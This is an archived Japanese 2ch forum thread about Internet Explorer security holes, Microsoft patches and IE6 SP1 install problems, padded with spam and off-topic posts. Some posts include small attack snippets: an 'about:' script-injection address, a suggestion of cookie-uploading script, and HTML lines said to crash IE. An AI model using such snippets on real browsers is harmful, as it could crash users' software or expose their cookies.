ネット閲覧ソフトに不具合　修正ソフト提供
　米マイクロソフトは２２日、同社のインターネット閲覧ソフトの「インターネット・
エクスプローラ」とビジネス用ソフト「オフィス」にセキュリティー上問題があると
警告した。同社は対応するソフトを無料で提供し、使用を呼び掛けている。
問題になったのは、最新のインターネット・エクスプローラ３種類と「オフィスＸＰ」
など１３種類のソフト。（ニューヨーク共同）
［毎日新聞８月２４日］ ( 2002-08-24-20:39 )

なんじゃこりゃ？　さすが経済記者だな、こいつ。

レスくれた方さんくす。

>>772
WindousUpDateはあまりやりたくないんです。
スパイウェア入れられるみたいなので。

>>776
多分使っていないと思います。
よってMS02-047だけにしておきます。

>>768
ちょっと遅いかも知れんが・・
IE5は、マイクロソフトはサポートを打ち切った。
よって、セキュリティホールが発覚してもパッチは出ない。

今回、5.0用がないのも、安全だからということではない。
IE5.5ないし、6.0にしろ、ということだね。

んでもってIE5.5ないし、6.0にすると重いから
新しいの飼え！ってこと？

＞スパイウェア入れられるみたいなので

おまえのプライバシーなんか　誰も興味ねーよ　自意識過剰クン
キミは自分が思ってるほど誰からも重要視されとらんのよ

やましいことでもあるんじゃないのか？

>>781,782
お前ら本当にバカだな。
ちょっとは社会のこと勉強しろ。

そんなに不安ならIEに依存しないタブブラウザやNNを使えばいいんだよ

>>784
いちいち上げんなボケ。

これって、クロスサイトスクリプティングの脆弱性というものですか？

InternetExplorerでアドレス欄に「about:<script>window.open("http://www.yahoo.co.jp/")</script>」
って入れるとウインドウが開いてヤフーがでます。

どうも「about:」に続いてＨＴＭＬコードを書くだけで、ＨＴＭＬコードの部分のタグが有効になったページが
表示されます。
このＨＴＭＬコードのところにscriptタグに続いてクッキーをアップロードするJavaScriptや
特定の危険なページを開かせるコードとか書くと危険な気がします。

すでにこのことは、がいしゅつでしょうか？

age

最新バージョンがQ321232なんだけど、
最近ちょっと気づいたことがある。

IE開くと、ホームページがgoogleに設定されてるんだけど、
googleに接続する前に一瞬216.〜につながれてるみたい…

IE6．0に更新するまではこんなことなかったと思うのだけど。

あと↑でいわれてる奴ってALEXA(スペル違うかも)なの？
ad-awareでレジストリでIEのところにでてきたので削除したけど。
その時寝ぼけててバックアップとらずに削除しちゃったけど今のところなんともないや。

216.〜につながらずにどうやってgoogleにいくのかと聞きたい。

www.google.com www.google.co.jp 216.239.33.101
google.com 216.239.51.100 216.239.35.100
google.co.jp 216.239.37.100 216.239.39.100 216.239.33.100 216.239.35.100

>>788
googleは　216.239.33.101　だからそれが表示されただけじゃないかな

ヽ(ﾟ∀ﾟ)ノｱﾋｬ



ありがとうございました。

あげ

http://www.zdnet.co.jp/news/0209/06/ne00_mshole.html

広範囲に影響、Windowsの新たな脆弱性

同社はこのセキュリティホールを深刻度「高」として、セキュリティ警告を発行。WindowsおよびMacintosh対応プログラムを含め、
1ダース以上のMicrosoft製品で、Webサイトやソフトウェアコードの信頼性確認に利用される「電子証明書」の処理に影響を及ぼす可能性がある。

　この欠陥を悪用すれば、正規の電子証明書を発行しているWebサイトに、別の偽の電子証明書を発行させ、
利用者のコンピュータに不正アクセスしたり、その利用者のパスワードやクレジットカード番号を盗み出すことができる。

http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS02-050.asp

こっちも

MicrosoftがIE 6 Service Pack 1を準備中
Microsoftが，Internet Explorer（IE） 6 Service Pack 1（SP1）を準備して
いることが 明らかになった。
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20020909/1/

おぉー後三日もすれば落とせるな

>>795
遅きに失した感ありすぎ。

英語とドイツ語はもう出てるな

、イスラエル企業が警告
http://japan.internet.com/webtech/20020910/10.html

題名が変だったｽﾏｿ

IE に新たな脆弱性、イスラエル企業が警告
http://japan.internet.com/webtech/20020910/10.html

サービスパック出しても次々と…
もう駄目だこりゃ

Microsoft VM

http://slashdot.jp/article.pl?sid=02/06/15/060248&mode=thread

メギャーン

http://www.watch.impress.co.jp/internet/www/article/2002/0910/mjvm.htm


Microsoftの「Internet Explorer(IE)」に付随するMicrosoft製のJava環境に複数の深刻な
セキュリティーホールが発見された。このセキュリティーホールを発見したのはフィンランドの
Online Solutions社で、Microsoftはこの問題を認め、現在パッチを準備している最中だという。
9日にMicrosoftより発表された「Internet Explorer 6 SP1」では、未対応の問題である。

穴のあいた　ざる

変

MS02-050はmacの人のみ？
解説読んだが意味分からん。

http://www.microsoft.com/japan/technet/security/bulletin/ms02-050.asp

...

>>807
よく読めよ。影響を受けるソフトウェアのところにかいてあるだろう。

Becky!2が2.05.05でIE6 SP1を入れるとHTMLメール作成で落ちるからこれに対処する修正を施した2.05.06が出たが、
IE6 SP1の日本語版が出てない現状では検証のしようがねーぞ。

ってか、もう隠れリリースされてたのか。
http://download.microsoft.com/download/ie6sp1/finrel/6_sp1/W98NT42KMeXP/JA/ie6setup.exe

↑トホホ、コンポーネントダウソできず。

パッチをちゃんと入れてたらSP1を入れる必要はないんでしょ？
なんか怖い。

人柱どもの報告を待ちませう

IE6 SP1日本語版リリース
http://www.microsoft.com/windows/ie_intl/ja/

http://pc.2ch.net/test/read.cgi/sec/1021363841/143-

IE6SP1 readme から抜粋。

・Window.open はフルスクリーンモードでは開けなくなった
・Window.{move,resize,open} メソッドを使ってウィンドウを画面の外に移動させることはできなくなった
・COM サーバーをインストールするには ActiveX を有効にする必要がある
・cookie を使うためにはサーバ名が [A-Za-z0-9\-.]* でなければならない
・WebOC はインターネット上では利用できなくなった
・OBJECT タグの codeBase 属性はローカル パスを指定できなくなった
・制限付きゾーンではフレームと IFRAME が無効になる
・ファイルのダウンロード ダイアログ ボックスの変更
・Gopher プロトコルは既定では無効になった

>>816
結局SP1はいいの？　悪いの？

>>814
Win2000SP3+Hotfix
これにIE6SP1適用で問題なしです。

>>817
SP1は適用してもいいかと。。。

自分、SP１入れたら、調子悪くなって、ネットできなくなったんで
削除した。XPです。

WinME+IE6SP1+MS02-052で現在異常なし。

SP1がそもそもインスト出来ない。
何度やっても途中でポシャる。
それよりもＰＦＷplusの表示異常なんとかして。
質問を送ったのにマカフィーときたら1週間以上放置。

オフラインなんちゃらと上級オーサリングがインストされてないって文句いうが
おまえがインストしないんじゃねーかIEよ

使わないからいいや

スパイウエアが５個インストールされた。

↑
SP1のこと

http://www.430.jp/rak2/user/ryuugasakikaori/

>>823
訂正
スパイウエアかどうかは不明。Ad-awareで検出されたファイルが５個だった。

レスさんくすでした。
念のため色々バックアップ取ってから入れよう・・・。

削除して良しですか？

Alex飼ってみようかな♪

消してヨシ

MS02-052って、
http://www.microsoft.com/japan/technet/security/bulletin/ms02-052.asp
この情報によるとWindows Updateからしか入手できないようですけど
ファイルで入手できないでしょうか？

>>831
http://pc3.2ch.net/test/read.cgi/win/1024631995/308

何故ファイルで必要なのでしょうか？

>>832
あちらの板にあったのですね。ありがとうございます。

諸事情で、ネット接続できないＰＣを持っていますので。
今後、Windows Updateのみの配布形式に徐々に移行していくのでしょうか・・・

SP1入れたら、フリーズする様になった。

他板でもSP1を入れて不具合が出てる人が続出ですね。

結論　SP1は入れるな

このフリーズはSP1のせいか！

フリーズはしないんだがMS02-052入れてもヴァージョンとこに出てこない
Windows Updateではもう入れたことになってるからいいのか？

>>837
MS02-052はJAVA仮想マシンのバグ修正だから
IEの修正と直接は関係無い。よってIEのバージョンには出てこない。

MSめ！！重要な更新にSP1入れやがって！！

証明書確認の問題により、IDが偽装される (Q328145) (MS02-050)
http://www.microsoft.com/japan/technet/security/bulletin/ms02-050.asp
今回の更新内容
Internet Explorer for Mac (for OS 8.1 to 9.x) および
Internet Explorer for Mac (for OS X) の問題を修正するプログラムを
公開しました。

>>840
それよか MS02-050 のバグ修正版をはやく出せぃ！！＞Ｍ＄

MS02-052入れたら立ち上がらなくなった・・・・
SafeModeでスキャンディスクしてもその後固まってしまう・・・・
(WinMe＋IE6/SP1)

今さっき6.0SP1をインスコしたよ〜。
今これで見てるんだぜ〜。OutPost+Proxomitronで
完璧なんじゃないんかな〜って自己満足してまーーす｡

先日、IE 6 SP1 にしたら「エラーになった」と文句言ってきて、
オレがていねいにアドバイスしてやったヤツが、まぁ〜た、
　　「OE で、エラーがでました！」
とか報告してきやがった。粘着ヴォケは手がつけられん

>>842 パッチ当てるときはFWやウィルス対策ソフトなどの常駐アプリを
停止させて行わないと、不具合出ることあるよ。あと、パッチは古い順に
当てて、一つ当てるごとに再起動する。
WinME+IE6SP1+MS02-050+MS02-052+MS02-054+MS02-055で無問題。

WinME ユーザーから質問あったけど、
IE アンインストールで「以前の Windows の環境に戻す」とかにして、
Win再起動して、Program Files\Internet Explorer を削除してから、
Microsoft から IE 6 SP1 のファイルをすべてダウンロードしてから、
「カスタムインストール」でインスコ。
さらに、MS02-008パッチあて とか、わけのわからん指示もあるが…

>>845
もちろん常駐アプリは止めてやったんですが・・・。
でもパッチ当てる順番はWindowsUpDateでやったのでよくわからんです。

OE(又はIEｺﾝﾎﾟｰﾈﾝﾄ使用ﾒｰﾗｰ)の問題点とその対策方法
http://pc.2ch.net/test/read.cgi/sec/1021363841/168
にInternet Explorerの最新バージョンをOS別にまとめました。

http://pc.2ch.net/test/read.cgi/sec/1021363841/168-n

クリップボードの内容を攻撃者に盗まれるという脆弱性あり。
http://homepage2.nifty.com/spw/secure/008/index.html
http://pc3.2ch.net/test/read.cgi/win/1031641815/391

Proxomitronをバイパスモードに切り替えて検証した結果、IE6 SP1でも再現可能。
MSは認識していない模様。
Proxomitron使用者は以下のフィルタを導入すること。

Name = "ClipBoard Unsniffer"
Active = TRUE
Limit = 256
Match = "clipboardData"
Replace = "proxClipBoardData"

Proxomitron非使用者は「スクリプトによる貼り付け処理の許可」を無効にすること。

>>850　おおｻﾝｸｽ。確かにIE6SP1で再現された。

もうダメポ

マイクロソフト，セキュリティ・ホールの深刻度に関する評価方法を変更
http://pc.2ch.net/test/read.cgi/sec/1021363841/215

MS02-065
「MS02-065: Microsoft Data Access Components のバッファオーバーラン
により、コードが実行される (Q329414)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-065ov.asp
MS02-066
「MS02-066: Internet Explorer 用の累積的な修正プログラム (Q328970)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-066ov.asp

http://pc.2ch.net/test/read.cgi/sec/1021363841/216-218

恒例行事age

オミトロンやFWでガチガチに固めてても､うｐでーと必須？
(ガチガチといっても､マニュアル以上の事はできないけど)

>>856
バグをどうやって塞ぐのか分かってるか？

http://www.asahi.com/business/update/1127/034.html

マイクロソフト、政府向けなどにＯＳの「設計図」公開

MDAC2.7インストールしようとした時に、
常駐アプリ全て終了させても
使用中のアプリケーションの終了を促すダイアログが表示されるんだけど、
どうしたらいいの？

使ってるOSは、WinNT4.0Serverです。
IIS等のサービスを終了させてもダメですた。

>>859 インスコするときに説明するダイアログが出てたはずだけど。
どうしたらいいの → 使用中のアプリを終了させる。
http://www.microsoft.com/japan/msdn/data/download/mdac/27/27.asp

MS02-065、MDAC2.7関係は
http://pc.2ch.net/test/read.cgi/sec/1021363841/250-251のリンク先も参照。

>860
いや、全てのアプリと、IIS等のサービスを
終了させても、
”システムプロセスで使用されている”
と言ったエラーメッセージが表示されてしまうんだけど・・・

システムプロセスで使用されている場合は、
更新不可能なのかな？

>>862 セーフモードでも使用中になる？

age

>862
NT4にはセーフモードは無いです。

セキュリティのかかった場所に移動しようとすると
「ページを表示できません」
になります
どうしたらいいのでしょうか？
誰か助けて下さい。
「SSL2.0を使用する」と
「SSL3.0を使用する」にはチェックしたのですが
何も変わりませんでした

★★非IE系ブラウザ★★
オペラ
http://jp.opera.com/
http://pc3.2ch.net/test/read.cgi/win/1036518411/

ネスケ
http://wp.netscape.com/ja/

Mozilla
http://jt.mozilla.gr.jp/

Mosaic　（わらい）
http://archive.ncsa.uiuc.edu/SDG/Software/Mosaic/


★★ブラウザランキング★★
http://pc3.2ch.net/test/read.cgi/software/~~~~303519/

ttps://www.netsecurity.ne.jp/article/1/7677.html
IE、OE の安全な利用には高度な知識と情報収集能力が必要！？(2002.12.3)

　今回、マイクロソフト社がリリースした MS-066 (註MS02-065の間違い) パッチは、IEやOEは、
初心者向けではないことを端的に示している。
　パソコンを買った時にタダでついているIE、OEをそのまま利用している人を見てもただの初心者
と思ってはいけない。高度な知識と情報収集能力を兼ね備えたエキスパートか、IT社会の健全な
成長のための無垢な犠牲者のどちらかなのである。読者諸氏には、周知の事実だと思うが、
つねに脆弱性と隣り合わせのIE、OE利用者の場合、初心者がトラブルなく利用できているという
状態は、偶然の産物でしかありえない。それは無垢な犠牲者の予備軍なのである。
[Prisoner Langley]

あえてレス。
IEはちょっと。。。。。んだけど。

OEは、送信専用なら、これだけhtml編集に有用なメーラーは無いっす。
htmlメルの海辺画像とか背景貼り付けってのは、ネットナンパに最も有効な手段でし。

受信の方は。
OEのメルテキスト化機能があまり膾炙していないのかなぁ。
そこらへんは、今後啓発してきましょ（らぶ

モザイクってまだあったんだ・・・

>>869
でもお金出してベッキーとかユードラとかあたりをレジストしちゃった人は
OEにしにくいのかもね・・・、おれもそのクチだけど

>>870
テキスト化と言えば、ポスペも。
んでも非対応メーラーの相手に、ペットが拡張子ppdのファイルになってまって、「ウイルス？」と疑われたりするけど。

昔掲示板で何度か答えたことがあるな
「ppdってファイルが添付されてたんですけど・・・何ですかこれ？」
って、もちろん質問者は女性名のステハン。

「MS02-068: Internet Explorer 用の累積的な修正プログラム (324929) 」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-068ov.asp
概要
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開された MS02-066 : Internet Explorer 用の累積的な修正プログラム
(Q328970) で修正された問題に加えて、新たに 1つの問題を排除します。
対象となる製品
・ Microsoft Internet Explorer 5.5 Service Pack 2
・ Microsoft Internet Explorer 6
・ Microsoft Internet Explorer 6 Service Pack 1
Microsoft Internet Explorer 5.01 は、この問題の影響を受けません。

http://pc.2ch.net/test/read.cgi/sec/1021363841/260

update激重だね

http://www.pivx.com/larholm/unpatched/

ここの件数が 0 になるのはいつ。

859　は、結局解決したのか？

漏れら極悪非道のageブラザーズ！
今日もネタもないのにageてやるからな！
￣￣∨￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　 ∧＿∧ 　 ∧＿∧ 　　　age
　（・∀・∩）（∩・∀・）　　　　age
　（つ　　丿 （ 　　⊂）　age
　 （　ヽノ　　 ヽ/　　）　　　age
　 し（＿）　　 （＿）Ｊ

>876
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20021210/1/

age

（＾＾）

放置プレイ？
ttp://japan.internet.com/webtech/20030206/11.html

>>881
「OE(又はIEｺﾝﾎﾟｰﾈﾝﾄ使用ﾒｰﾗｰ)の問題点とその対策方法」でｶﾞｲｼｭﾂ
http://pc.2ch.net/test/read.cgi/sec/1021363841/330-335n

（＾＾）

　　 ∧＿∧
　　（　　＾＾ ）＜ ぬるぽ（＾＾）

━―━―━―━―━―━―━―━―━[JR山崎駅（＾＾）]━―━―━―━―━―━―━―━―━―

　　　 　∧＿∧
ﾋﾟｭ.ｰ　(　　＾＾ ） ＜これからも僕を応援して下さいね（＾＾）。
　　＝〔~∪￣￣〕
　　＝ ◎――◎ 　　　　　　　　　　　　　　　　　　　　　山崎渉

　__∧＿∧_
　|（　　＾＾ ）|　＜寝るぽ（＾＾）
　|＼⌒⌒⌒＼
　＼ |⌒⌒⌒~|　　　　　　　　　山崎渉
　　 ~￣￣￣￣

>>1
マジ？

>>888
糞スレ上げないでよ。というか昔の奴に語りかけても意味ないじゃん

　　　 　∧＿∧　 ∧＿∧
ﾋﾟｭ.ｰ　（　 ・３・） (　　＾＾ ） ＜これからも僕たちを応援して下さいね（＾＾）。
　　＝〔~∪￣￣￣∪￣￣〕
　　＝ ◎――――――◎ 　　　　　　　　　　　　　　　　　　　　　山崎渉&ぼるじょあ

　　　 (⌒V⌒)
　　　│ ＾ ＾ │＜これからも僕を応援して下さいね（＾＾）。
　　⊂|　　　　|つ
　　　（＿）（＿）　　　　　　　　　　　　　　　　　　　　　　山崎パン

１．次の内容のＨＴＭＬファイルを作成する。

<script>
alert("ここでＦ１を押す！");
</script>


２．ダイアログに従い、Ｆ１を押す。
３．確実にＩＥが落ちます

えらく古いスレが上がってきたな

（・∀・）ｺﾝﾆﾁﾊ!!!

剥けた

（・∀・）ｺﾝﾊﾞﾝﾜ!!!

IE5.5のUser Agentに「(R1 1.3)」ってのが付いたり消えたりするんですけど、
これって何ですか？

>>897
>>893
板違い。Windows＠2ch掲示板http://pc5.2ch.net/win/
IE5 (5.015.5)統合スレッド 3http://pc5.2ch.net/test/read.cgi/win/1079153566/l50

IE5.5のUser Agentに「(R1 1.3)」ってのが付いたり消えたりするんですけど、
これって何ですか？

今だ！900ゲットォォｫｫ！！
￣￣∨￣￣￣￣￣￣￣￣
　　 　 ∩ ∩
　　 〜| ∪ |　　　　　　　　　(´´
　　 ﾍﾉ　　ﾉ　　　　　　　(´⌒(´
　　(（つ　ﾉ⊃≡≡≡(´⌒;;;≡≡≡
　　￣￣￣(´⌒(´⌒;;
　　　ｽﾞｽﾞｽﾞｽﾞｽﾞ

あげ

OE(又はIEｺﾝﾎﾟｰﾈﾝﾄ使用ﾒｰﾗｰ)の問題点とその対策方法
http://pc8.2ch.net/test/read.cgi/sec/1021363841/
も980越えでdat落ち
ここも含めて総合スレにしない？
IE＋OE＋α（win板にもｽﾚあるけどこの板にもあったほうがいいと思うんでWindowsUpdateの話題もアリで）

スレタイ：
【IE】MS製ソフトのセキュリティ総合スレ【OE】

本文：
MS製ソフト各種のセキュリティと関連する話題（OS非限定）をセキュリティ板で語るスレです

>>902いくら連発されてもめげずにパッチ当て続けようってことで♪つけてみれば？
スレタイ：【IE】MS製ソフトのセキュリティを語ろう♪【OE】

本文：
MS製ソフト各種のセキュリティと関連する話題（OS非限定）をセキュリティ板で語るスレです

OE(又はIEｺﾝﾎﾟｰﾈﾝﾄ使用ﾒｰﾗｰ)の問題点とその対策方法
http://pc8.2ch.net/test/read.cgi/sec/1021363841/
緊急！　WindowsUpdateをしましょう！
http://pc8.2ch.net/test/read.cgi/sec/1060956936/

ＩＥ５・５と６・０、ネット閲覧ソフトに欠陥
http://pc8.2ch.net/test/read.cgi/sec/1005605775/l50
【MS謹製】Microsoft MBSA使ってる？【ツール】
http://pc8.2ch.net/test/read.cgi/win/1085558954/l50

>903
【IE,OE】MS関係のｾｷｭﾘﾃｨを語ろう♪【ﾏｲｸﾛｿﾌﾄ】
http://pc8.2ch.net/test/read.cgi/sec/1125125691/

★★★★★★★★★★★★★★★★★★★★★★★★★

ウイルス対策ソフトの検出力結果
http://www.geocities.co.jp/SiliconValley-Cupertino/2010/

★★★★★★★★★★★★★★★★★★★★★★★★★

10月分ﾊﾟｯﾁage

>>785
うるせー馬鹿

IE5.01-SP4 っていつの間に出たんですか？

Windows 2000 SP4の中だけ

うんこー

はとぽっぽー

もういいよ

いつの話だよ

一千年

二千年前

欠陥だらけ

ひさしぶりに上げ

このペーの表示が崩れてるんだけど俺だけ？
http://www.itmedia.co.jp/enterprise/

only you

トップ、ニュース、企画、運用・・・・のリンクが
縦一列になってて読みにくいんだよな
不要な<span>が一杯入ってるのが原因かと思ったんだが
きっとブラウザの問題だな
Thx lot !

IEは糞

IE市ね

IEは悪質な技術誘導の権化

IEは時代遅れの産物

IEは低機能すぎる

IEは4ならよし

たまに禿げよう

さっさとPNGにちゃんと対応しやがれ

XHTMLに対応しろ糞が

拡張子から適当にMIME推測すんな

Firefoxが出てこなかったら
いまだにIE6並の低機能だっただろうな

国産のプニルとかネスケあるから問題なし

今度はadobeかよ！

あげ

表面的な動作なんてどうとでもなる

ちゃんと仕様に従え

うるせぇ

仕様に従わないから嫌い

たまには上げるべ

またかよｗ

まただよ

いい加減しろ〜IE

潜りすぎだろ

■国家破産

日本は昭和21年以来、再度破産しようとしています。
日本の借金は、現在国と地方を合わせた長期債務残高が
約700兆円。さらに、いわゆる隠れ借金の約400兆円の
合計は、なんと約1100兆円にもなります。

この借金は国内総生産(GDP)比(700兆円として141%。
隠れ借金を含めた借金1100兆円とすれば220%です)
でも世界最悪です。

しかし、借金に対し
平成16年度の税収は42兆円しかありません。

これでは、税収の1割を借金返済に充てても
700兆円を返済するには約170年かかり

隠れ借金を含めた1100兆円を返済するには
約260年もかかります。

平成16年度一般会計の歳出が
82兆円、税収は42兆円、新規国債発行は37兆円です。

財政を家計に例えるなら
借金総額が１億1000万円の人が、月収は約35万円
1ヶ月の生活費は約70万円、
不足分の約35万円を借金するのと同じことです。

IE8になったら
ちったぁましになるか

!

テキサス州議会は行政機関が(PCのOSを)Windows Vistaにアップグレードする事を
議会の書面による許可がない限り禁じる条項を含む予算を予備承認した。
ttp://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9130992

216 名前： ただいま名無し変更議論中＠詳しくは自治スレへ [sage] 投稿日： 2009/04/12(日) 15:48:34 ID:???
http://www.google.com/toolbar/ie8/intl/ja/
Google版IE8

どうやらMSとGoogleは手を結んだ模様。Firefoxを叩き潰すのかな。

就職氷河期の四大卒の就職率：文部科学省の統計より
（以下は、最も酷かった時期）
2000年　男性55.0％、女性57.1％
2001年　男性55.9％、女性59.6％
2002年　男性54.9％、女性60.0％
2003年　男性52.6％、女性58.8％
2004年　男性53.1％、女性59.7％
2005年　男性56.6％、女性64.1％


卒業年度　　　　求人数
1991年3月卒　　840,400人
2003年3月卒　　560,100人

　

いまどきIE5なんて

ちら

document.write("<body onload=window();>")

　 　 　 　∧＿∧　　　　　　ｶﾞｯ
　　　　　（,, ・∀・）　　人
　　　　 　（⊃ 　.(⌒).< 　>_∧∩
　　　　　　(__ノ⌒￣　 Ｖ｀Д´）/
　　　　彡　　　　　　　　　　　/ ←>>884